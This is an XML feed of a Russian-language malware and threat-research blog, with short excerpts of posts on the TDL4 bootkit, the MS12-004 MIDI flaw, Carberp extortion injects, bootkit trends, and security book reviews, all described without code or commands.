<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2182101645168532490</id><updated>2012-02-12T17:24:45.783+04:00</updated><category term='Python'/><category term='TDL4'/><category term='DDoS'/><category term='IDA'/><category term='Cybercrime'/><category term='Duqu'/><category term='Antiforensics'/><category term='REcon'/><category term='Bootkits'/><category term='Statistics'/><category term='Ekoparty'/><category term='Forensics'/><category term='Rovnix'/><category term='Fuzzing'/><category term='Reflections'/><category term='Bochs'/><category term='Reversing'/><category term='Rootkits'/><category term='CONFidence'/><category term='TDL3'/><category term='Virus'/><category term='Hiew'/><category term='Carberp'/><category term='ZeroNights'/><category term='Immunity Debugger'/><category term='Antivirus'/><category term='Events'/><category term='SCADA'/><category term='Android'/><category term='FUN'/><category term='BIOS'/><category term='Defcon'/><category term='CARO'/><category term='Video'/><category term='DEP'/><category term='Decompilation'/><category term='Olmasco'/><category term='VBR'/><category term='ASLR'/><category term='Adobe'/><category term='SpyEye'/><category term='Mobile'/><category term='BlackHole'/><category term='Olmarik'/><category term='IPython'/><category term='PDF'/><category term='Javascript'/><category term='Deobfuscation'/><category term='CC'/><category term='Cyberwar'/><category term='0-day'/><category term='CVE-2010-0249'/><category term='ZeroAccess'/><category term='Metasploit'/><category term='System Internals'/><category term='codname Aurora'/><category term='Hex-Rays'/><category term='Stuxnet'/><category term='Perl'/><category term='VB'/><category term='Java'/><category term='SmartCard'/><category term='Malware'/><category term='VMware'/><category term='Zeus'/><category term='Exploits'/><category term='Tools'/><category term='Botnet'/><category term='IE'/><category term='IdaPython'/><category term='heap-spray'/><category term='VirusTotal'/><category term='ROP'/><category term='Black Hat'/><category term='MBR'/><category term='Books'/><title type='text'>Fuzzing the World</title><subtitle type='html'>REFLECTIONS ABOUT REVERSE ENGINEERING, THREAT RESEARCH AND SOME MORE ...</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default?start-index=101&amp;max-results=100'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>134</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-3533552142573644850</id><published>2012-02-03T20:23:00.000+04:00</published><updated>2012-02-03T20:23:50.814+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><title type='text'>Обзор книги: "The Tangled Web"</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Люди занимающиеся практической информационной безопасностью безусловны знакомы с исследованиями &lt;a href="http://www.linkedin.com/in/lcamtuf"&gt;Michal Zalewski&lt;/a&gt;, который практически является законодателем моды, всего того, что касается безопасности современных веб-браузеров. Так вот совершенно недавно вышла  за его авторством замечательная &lt;a href="http://nostarch.com/tangledweb.htm"&gt;книга&lt;/a&gt; &amp;quot;The Tangled Web: A Guide to Securing Modern Web Applications&amp;quot;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div&gt;&lt;i&gt;“Thorough and comprehensive coverage from one of the foremost experts in browser security.” - Tavis Ormandy, Google Inc.&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;br&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-HOZ97PhcJgU/TyvRULtbAwI/AAAAAAAABHc/5jcIHZn43lU/s1600/tangledWeb_cvr-webquality.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-HOZ97PhcJgU/TyvRULtbAwI/AAAAAAAABHc/5jcIHZn43lU/s320/tangledWeb_cvr-webquality.png" width="242"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;В информационной безопасности есть такие области для которых очень редко выходят стоящие книги из разряда &amp;quot;must read&amp;quot;. Вот и веб-безопасность относится к таким областям, литература вроде бы есть вокруг, но стоящее чтиво в этой области большая редкость. И именно о такой стоящей книге пойдет сегодня речь ;)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2012/02/tangled-web.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-3533552142573644850?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/3533552142573644850/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2012/02/tangled-web.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3533552142573644850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3533552142573644850'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2012/02/tangled-web.html' title='Обзор книги: &quot;The Tangled Web&quot;'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-HOZ97PhcJgU/TyvRULtbAwI/AAAAAAAABHc/5jcIHZn43lU/s72-c/tangledWeb_cvr-webquality.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8543572529159019116</id><published>2012-02-02T21:38:00.000+04:00</published><updated>2012-02-03T13:35:13.880+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='ZeroAccess'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Olmarik'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Обновление TDL4: Purple Haze all in my brain</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: white; text-align: justify;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span style="font-size: x-small;"&gt;Purple haze all in my brain&lt;/span&gt;&lt;br&gt;&lt;span style="font-size: x-small;"&gt;Lately things just don&amp;#39;t seem the same&lt;/span&gt;&lt;br&gt;&lt;span style="font-size: x-small;"&gt;Actin&amp;#39; funny, but I don&amp;#39;t know why&lt;/span&gt;&lt;br&gt;&lt;span style="font-size: x-small;"&gt;                                      Jimi Hendrix&lt;/span&gt;&lt;br&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;/span&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Давно я не писал про TDL4 (Win32/Olmarik.AYD) и обновления этого семейства, собственно ничего интересного там и не происходило уже несколько месяцев. Но не так давно нам попался на глаза интересный образец (отдельное спасибо за это Mila [&lt;a href="http://contagiodump.blogspot.com/"&gt;contagiodump blog&lt;/a&gt;]). Немного углубившись в анализ стало понятно, что это модифицированный Olmarik, у которого поменялся дроппер и немного изменилась скрытая файловая система.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Собственно начнем с дроппера, который использует несколько интересных методик для поднятия привилегий, которые раньше нам в этом семействе не встречались. В процессе установки на Vista/Win7 для обхода UAC скачивается дистрибутив Adobe Flash Player и используется в качестве плацдарма для последующей атаки DLL hijacking. Подобная техника уже была ранее &lt;a href="http://blogs.mcafee.com/mcafee-labs/zeroaccess-rootkit-launched-by-signed-installers"&gt;описана&lt;/a&gt; относительно ZeroAccess с подменой модуля msimg32.dll. Но в нашем случае подменяется ncrypt.dll.&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/--dwP8swFRiQ/TyrDSDzZaTI/AAAAAAAABF8/ywgsCxezwmM/s1600/0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="24" src="http://1.bp.blogspot.com/--dwP8swFRiQ/TyrDSDzZaTI/AAAAAAAABF8/ywgsCxezwmM/s320/0.PNG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2012/02/tdl4-purple-haze-all-in-my-brain.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8543572529159019116?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8543572529159019116/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2012/02/tdl4-purple-haze-all-in-my-brain.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8543572529159019116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8543572529159019116'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2012/02/tdl4-purple-haze-all-in-my-brain.html' title='Обновление TDL4: Purple Haze all in my brain'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/--dwP8swFRiQ/TyrDSDzZaTI/AAAAAAAABF8/ywgsCxezwmM/s72-c/0.PNG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-175868194562384667</id><published>2012-01-30T20:59:00.000+04:00</published><updated>2012-02-01T00:22:11.937+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>MS12-004 в дикой природе</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="text-align: left;"&gt;В последней порции патчей от MS вышло достаточно интересное исправление  &lt;/span&gt;&lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-004" style="text-align: left;"&gt;MS12-004&lt;/a&gt; &lt;span style="text-align: left;"&gt;(MIDI File Parsing Remote Buffer Overflow) для MS Media Player, которое закрывает уязвимость  с возможностью удаленного исполнения кода. После прочтения бюллетеня сразу стало понятно, что это довольно действенный способ установки вредоносных программ и в ближайшем будущем этот вектор распространения может быть активно задействован. Но давайте вначале поговорим о самой уязвимости, а она, на мой взгляд, довольно интересна. Этой уязвимости подвержены все существующие ОС от MS.&lt;/span&gt;&lt;br&gt;&lt;center&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="text-align: left;"&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="text-align: left;"&gt;Уязвимость содержится в библиотеке winmm.dll, которая реализует все необходимое для обработки MIDI файлов. Кстати сам &lt;a href="http://ru.wikipedia.org/wiki/MIDI"&gt;MIDI&lt;/a&gt; (Musical Instrument Digital Interface) формат уходит своими корнями в далекий 1982 год. Неплохое описание самого формата есть &lt;/span&gt;&lt;a href="http://www.sonicspot.com/guide/midifiles.html" style="text-align: left;"&gt;здесь&lt;/a&gt;&lt;span style="text-align: left;"&gt;. Ключевым моментом в этой уязвимости является сам формат MIDI, а точнее две структуры MThd и MTrk, которые заполняются в памяти.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="text-align: left;"&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="text-align: left;"&gt;&lt;/span&gt;&lt;br&gt;&lt;/div&gt;&lt;/center&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2012/01/ms12-004.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-175868194562384667?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/175868194562384667/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2012/01/ms12-004.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/175868194562384667'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/175868194562384667'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2012/01/ms12-004.html' title='MS12-004 в дикой природе'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-Q_1jUgVrB5w/Tya8wYrv2KI/AAAAAAAABFk/dN7SSoFvKk4/s72-c/1.PNG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8294341683355462189</id><published>2012-01-26T22:09:00.002+04:00</published><updated>2012-01-26T22:10:59.716+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='DDoS'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Carberp, Facebook и ddos.plug</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Про Carberp я уже писал ни раз, но тут опять граждане отличились интересной активностью. Во первых на прошлой неделе была &lt;a href="http://www.trusteer.com/blog/carberp-steals-e-cash-vouchers-facebook-users"&gt;замечена&lt;/a&gt; аналитиками из Trusteer интересная вещь, что с определенной конфигурацией Carberp стал вымогать деньги у зараженных Facebook пользователей за вход.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Nlt4AWgYr9Q/TyGOZtcNgNI/AAAAAAAABEs/Eku26-dUsmA/s1600/face.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="203" src="http://2.bp.blogspot.com/-Nlt4AWgYr9Q/TyGOZtcNgNI/AAAAAAAABEs/Eku26-dUsmA/s320/face.PNG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;И причем очень настойчиво их требовал уплатить в размере 20 Euro через Ukash:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vZmgHsZlRpw/TyGOyREbpkI/AAAAAAAABE0/oHqOI19vxS8/s1600/face_alert.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="http://1.bp.blogspot.com/-vZmgHsZlRpw/TyGOyREbpkI/AAAAAAAABE0/oHqOI19vxS8/s320/face_alert.PNG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Были мысли, что быть может новая модификация какая, но нет только специальный конфигурационный файл содержащий инжекты для Facebook. Выглядит этот конфигурационный файл так:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2012/01/carberp-facebook-ddosplug.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8294341683355462189?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8294341683355462189/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2012/01/carberp-facebook-ddosplug.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8294341683355462189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8294341683355462189'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2012/01/carberp-facebook-ddosplug.html' title='Carberp, Facebook и ddos.plug'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-Nlt4AWgYr9Q/TyGOZtcNgNI/AAAAAAAABEs/Eku26-dUsmA/s72-c/face.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2120524273300673849</id><published>2012-01-12T17:37:00.001+04:00</published><updated>2012-01-12T17:38:20.239+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Olmasco'/><category scheme='http://www.blogger.com/atom/ns#' term='Rovnix'/><category scheme='http://www.blogger.com/atom/ns#' term='ZeroAccess'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Antiforensics'/><title type='text'>Тенденции развития буткитов за прошлый год</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Прошедший 2011 год можно смело назвать годом развития сложных угроз. На протяжении всего года мы наблюдали значительный рост вредоносных программ для 64-битных платформ. Как и предполагалось в прошлом году, TDL4 (Olmarik) продолжил свое развитие, а вначале 2011 года появилась еще отдельная группа разрабатывающая семейство OImasco. Семейство &lt;a href="http://amatrosov.blogspot.com/2011/10/win32olmasco-tdl4.html"&gt;OImasco&lt;/a&gt;, так же известное, как MaxSS и базируется на усовершенствованных/модифицированных технологиях руткитов семейства TDL и этой осенью у этой ветки появилась полноценная поддержка 64-битных систем.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Эволюцию современных буткитов можно изобразить в виде следующей схемы:&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ij8oKkE2Zls/Tw63YDLfzOI/AAAAAAAABEQ/_fglk5JfHms/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/-ij8oKkE2Zls/Tw63YDLfzOI/AAAAAAAABEQ/_fglk5JfHms/s320/2.PNG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2012/01/blog-post.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2120524273300673849?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2120524273300673849/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2012/01/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2120524273300673849'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2120524273300673849'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2012/01/blog-post.html' title='Тенденции развития буткитов за прошлый год'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-ij8oKkE2Zls/Tw63YDLfzOI/AAAAAAAABEQ/_fglk5JfHms/s72-c/2.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4558226840074062294</id><published>2011-12-12T23:18:00.000+04:00</published><updated>2011-12-12T23:18:10.925+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Arts of Bootkit</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;&lt;div style="text-align: justify;"&gt;Несколько недель назад на конференции&amp;nbsp;&lt;a href="http://malcon.org/"&gt;MalCon'2011&lt;/a&gt; была представлена любопытная работа "Windows 8 Bootkit and Art of Bootkit Development" (Peter Kleissner). В ней описывается практически все известные наработки в области создания современных буткитов и что наиболее интересно автор нашел возможность создания рабочего концепта для Win8, несмотря на все утверждения MS о новых технологиях защиты &lt;a href="http://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx"&gt;SecureBoot&lt;/a&gt; (UEFI-based).&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Видео с демонстрацией работы концепта:&lt;/div&gt;&lt;/div&gt;&lt;iframe allowfullscreen="" frameborder="0" height="300" mozallowfullscreen="" src="http://player.vimeo.com/video/32666961?title=0&amp;amp;byline=0&amp;amp;portrait=0" webkitallowfullscreen="" width="400"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://stoned-vienna.com/downloads/The%20Art%20of%20Bootkit%20Development.pdf"&gt;The Art of Bootkit Development&lt;/a&gt;&amp;nbsp;[pdf]&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Видимо следующем шагом в эволюции высокотехнологичных вредоносных программ станет переход к использованию технологий аппаратной&amp;nbsp;визуализации&amp;nbsp;в массовом порядке, а не только в редких концептах.&lt;/div&gt;&lt;a href="http://vimeo.com/32666961"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4558226840074062294?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4558226840074062294/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/12/arts-of-bootkit.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4558226840074062294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4558226840074062294'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/12/arts-of-bootkit.html' title='Arts of Bootkit'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4101069074254839085</id><published>2011-12-07T21:35:00.001+04:00</published><updated>2012-02-03T17:21:36.557+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Обзор книги «A Bug Hunter’s Diary»</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Не так давно появилась в продаже англоязычная версия  достаточно любопытной &lt;a href="http://nostarch.com/bughunter.htm"&gt;книги&lt;/a&gt; «A Bug Hunter’s Diary», изданной &lt;a href="http://nostarch.com/"&gt;издательством&lt;/a&gt; No Starch Press. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;i&gt;&amp;quot;Give a man an exploit and you make him a hacker for a day; teach a man to exploit bugs and you make him a hacker for a lifetime.&amp;quot; - Felix &amp;#39;FX&amp;#39; Lindner, Head of Recurity Labs / 